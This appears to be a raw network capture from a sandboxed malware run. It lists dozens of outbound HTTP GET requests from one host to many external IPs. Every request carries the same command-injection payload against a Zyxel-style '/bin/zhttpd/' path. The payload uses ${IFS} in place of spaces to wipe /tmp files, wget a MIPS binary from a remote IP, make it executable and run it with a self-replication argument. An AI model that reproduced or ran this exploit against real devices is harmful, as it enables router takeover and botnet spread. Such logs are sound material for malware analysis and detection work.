                                        Jan 14, 2024 16:18:56.764481068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7689192.168.2.1346408188.107.238.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764540911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7690192.168.2.1355658112.250.23.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764585018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7691192.168.2.1333788210.47.78.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764617920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7692192.168.2.1360004213.50.189.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764699936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7693192.168.2.135766884.195.66.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764784098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7694192.168.2.1356100189.127.171.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764817953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7695192.168.2.1343014141.121.18.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764858961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7696192.168.2.1350674108.35.234.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764950991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7697192.168.2.135644662.83.49.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764981985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7698192.168.2.134851879.139.0.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765016079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7699192.168.2.1350120170.37.190.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765079975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7700192.168.2.135737464.65.53.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765122890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7701192.168.2.135302666.231.65.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765209913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7702192.168.2.1356974192.108.14.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765275002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7703192.168.2.1358446170.23.226.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765324116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7704192.168.2.1353472125.57.132.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765374899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7705192.168.2.1357192106.28.187.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765428066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7706192.168.2.1357938192.230.65.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765569925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7707192.168.2.134222698.31.139.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765571117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7708192.168.2.1336744112.177.251.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765615940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7709192.168.2.135852845.117.183.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765691996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7710192.168.2.134901466.201.142.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765750885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7711192.168.2.1356144129.104.237.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765815973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7712192.168.2.134998483.192.43.43443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765901089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7713192.168.2.134031459.52.51.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765948057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7714192.168.2.135563658.136.16.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.765968084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7715192.168.2.134752627.122.114.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766032934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7716192.168.2.1337944130.124.6.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766087055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7717192.168.2.1348186146.249.89.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766154051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7718192.168.2.134672492.229.158.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766215086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7719192.168.2.13504368.109.139.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766278982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7720192.168.2.1360672144.23.9.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766339064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7721192.168.2.134350024.60.94.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766386986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7722192.168.2.133916652.118.39.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766452074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7723192.168.2.135433262.77.25.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766494036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7724192.168.2.1346794187.94.166.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766541004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7725192.168.2.135463227.24.74.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766612053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7726192.168.2.1339776180.107.222.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766665936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7727192.168.2.134766684.244.205.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766719103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7728192.168.2.134567279.32.149.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766802073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7729192.168.2.1340090192.239.65.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766844034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7730192.168.2.134228276.182.56.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766896009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7731192.168.2.134963420.44.103.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.766976118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7732192.168.2.1348862200.220.235.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767003059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7733192.168.2.1357172118.36.120.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767067909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7734192.168.2.1335862143.151.30.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767126083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7735192.168.2.1338978124.141.60.89443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767180920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7736192.168.2.134604638.173.249.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767267942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7737192.168.2.1344240181.202.120.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767302036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7738192.168.2.1351800216.133.124.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767390966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7739192.168.2.135135636.42.238.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767395020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7740192.168.2.133633472.220.44.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767453909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7741192.168.2.134547292.109.78.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767512083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7742192.168.2.1347370167.167.21.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767584085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7743192.168.2.1355296218.239.196.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767636061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7744192.168.2.133536441.150.54.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767707109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7745192.168.2.135508060.192.31.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767786026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7746192.168.2.134983093.214.66.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767841101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7747192.168.2.1333200184.40.228.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767911911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7748192.168.2.1339140216.182.226.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.767971039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7749192.168.2.1336484117.40.63.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.768034935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7750192.168.2.1343046221.165.16.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.768115997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7751192.168.2.1338852217.6.96.76443
                                        TimestampBytes transferredDirectionData
